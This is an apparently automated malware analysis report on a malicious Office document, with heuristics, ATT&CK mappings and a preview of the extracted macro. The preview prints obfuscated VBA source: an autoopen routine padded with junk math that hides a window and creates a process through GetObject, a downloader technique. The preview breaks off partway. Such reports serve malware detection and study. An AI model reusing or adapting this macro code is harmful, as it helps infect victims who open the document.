Verdict: MALICIOUS
Risk Score: 222

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1204.002 Malicious File
The sample is a malicious Office document containing a VBA macro. The 'autoopen' macro is present and uses the GetObject function, which is a common technique for executing arbitrary code. This suggests the macro is designed to download and execute a secondary payload. No specific family could be identified.
Heuristics (7)

- ClamAV: Doc.Malware.Dsfj-6905985-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Malware.Dsfj-6905985-0
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- GetObject call (high, OLE_VBA_GETOBJ): GetObject call
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 16199 bytes | 71a3aad5210ba1f705290334e375c39f8347fa1e6c9ab023920b14bc08a33ec3 |
Preview: first 1,000 lines of the extracted script (macros.bas)
Attribute VB_Name = "McBABo"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "bwAAQQB"
Attribute VB_Base = "0{083E8E4F-7333-4DE3-975C-87E5BE09DE75}{965B932F-2E98-488C-948A-3A0C546735B2}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "FAUADQw"
Sub autoopen()
On Error Resume Next
If YADACkA = VADxU_GD Then
jBDB1XA = CVar(qXDokB)
C1GwDAAD = (101205095 + Rnd(so__AB4 * _
Tan(708947359 / Chr(124755860 / CDbl(wQ1xBA) * L_xZ4DDX / CDbl(604135494)))) * 178624750 * _
Atn(556091245 / Oct(503255865) - 207074283 * Int(z_AAA1QB)) * (534873275 - Atn(RACDDA)))
BXADoU = Int(zQBDBxQ - _
MAD_GAZ - 412497414 * Int(603344469))
End If
If ic1AQxBx = LUAQDo Then
LXXQDDUU = CVar(NQABwD)
HcAAQAA = (289389406 + Rnd(jAAAUBXw * _
Tan(652224662 / Chr(31746141 / CDbl(XBADQA) * aAXBAAZ / CDbl(303441909)))) * 662885042 * _
Atn(25240853 / Oct(284925518) - 805380599 * Int(E_ABAAAc)) * (706170682 - Atn(zBZAAUX)))
PDA_GA = Int(dAADGQA1 - _
z_AQBAcA - 257527050 * Int(9699502))
End If
Set zZoAxAUk = GetObject(bwAAQQB.Tag + bwAAQQB.IQ1AGA1Q + bwAAQQB.Tag)
If oZGAD_ = YAQD4AA1 Then
LcU1wDZ = CVar(HAkA1AGo)
i4AQD1 = (79195545 + Rnd(rAAAo_A * _
Tan(158329816 / Chr(548353451 / CDbl(ikUZZC) * NACADXA / CDbl(991010880)))) * 392771888 * _
Atn(225583305 / Oct(609036624) - 996059843 * Int(wAQAAAX)) * (519478883 - Atn(VUQQoA)))
wGAQoZ = Int(W_DCC_A - _
wCDxkw - 736633072 * Int(586596545))
End If
If Uw1AQZA = V1A1AA Then
FBAUCDAA = CVar(awUwUZ)
L4UAQxX_ = (484367768 + Rnd(l4ADQD * _
Tan(679210699 / Chr(59517750 / CDbl(sB1BUAk) * uQ_oA_ / CDbl(269071862)))) * 51720181 * _
Atn(21031964 / Oct(21990879) - 509919029 * Int(cCcZBkCB)) * (720245876 - Atn(WDQUwk1A)))
AAwUx4 = Int(iAUCc1 - _
vAcGAADB - 466987491 * Int(540598761))
End If
If cAoZcA = J1ZQcADk Then
EAUUUD = CVar(hAkAAAA)
sQX1kA4 = (358197078 + Rnd(icAUABQ * _
Tan(153325382 / Chr(514242251 / CDbl(XQCQXA) * zDAZAw / CDbl(359149986)))) * 688224264 * _
Atn(692158750 / Oct(979567079) - 677187710 * Int(LxCABA)) * (380328198 - Atn(NQAUAAwQ)))
rwQAoZc = Int(uBXBxDw - _
GAADAAAX - 855715159 * Int(407982257))
End If
zZoAxAUk.ShowWindow = 738293 - 738293
If w411DAUx = O_1ZXACw Then
JXBDQAA = CVar(OBwA4A)
vU4D_Z = (87960523 + Rnd(loACoD * _
Tan(670751758 / Chr(14397286 / CDbl(oXZABUcD) * GUBQDA / CDbl(825014073)))) * 887450535 * _
Atn(242824506 / Oct(719087240) - 689504271 * Int(mQAGAUw)) * (547162149 - Atn(tADUBQU_)))
iCxAB4AB = Int(tDAAQAUU - _
wQQUcAAG - 244463446 * Int(125662189))
End If
If wAQG_Q = KxUDADk Then
wDAA4ZU = CVar(mAAAAoUk)
kCD_kDQ = (544439065 + Rnd(iAAADwX * _
Tan(523204940 / Chr(394316748 / CDbl(H4Qx_U_) * j1cZ4Q4o / CDbl(285257778)))) * 283448523 * _
Atn(65358154 / Oct(946572829) - 491506286 * Int(qGxGUG)) * (885913497 - Atn(BBDBAG)))
VDUDCA = Int(f1wkA4A - _
KAGAAAAQ - 925752717 * Int(467445725))
End If
If iBQwZXU = MxQxox_ Then
UBAUQA = CVar(wAAUZCx)
VZAxA4w = (106169124 + Rnd(VCAABUA * _
Tan(88096912 / Chr(722804815 / CDbl(CoAkA1Bc) * aA_4C4 / CDbl(248778481)))) * 238025100 * _
Atn(265996728 / Oct(12588907) - 602739977 * Int(D_QQAc)) * (465808297 - Atn(mADAcA)))
UkABAA = Int(tAQB_D - _
fGG_QQxA - 193560848 * Int(204645670))
End If
GetObject(bwAAQQB.Tag + bwAAQQB.QoAcA_ + bwAAQQB.Tag). _
Create bwAAQQB.Tag + bwAAQQB.OUA1wDC + bwAAQQB.Tag + bwAAQQB.RAGC_QU + bwAAQQB.Tag + bwAAQQB.Tag + bwAAQQB.CAZQABBk + bwAAQQB.Tag + bwAAQQB.Tag + bwAAQQB.G1AAUAAA + bwAAQQB.Tag + bwAAQQB.AADA_A + bwAAQQB.Tag, X4AxQU, zZoAxAUk, bwAAQQB.Tag
If r_UQQxAZ = aGA4cBAX Then
tAAA1AoA = CVar(noAZAZc)
GQGUAw = (594065071 + Rnd(jXA1AA * _
Tan(968045264 / Chr(
... (truncated)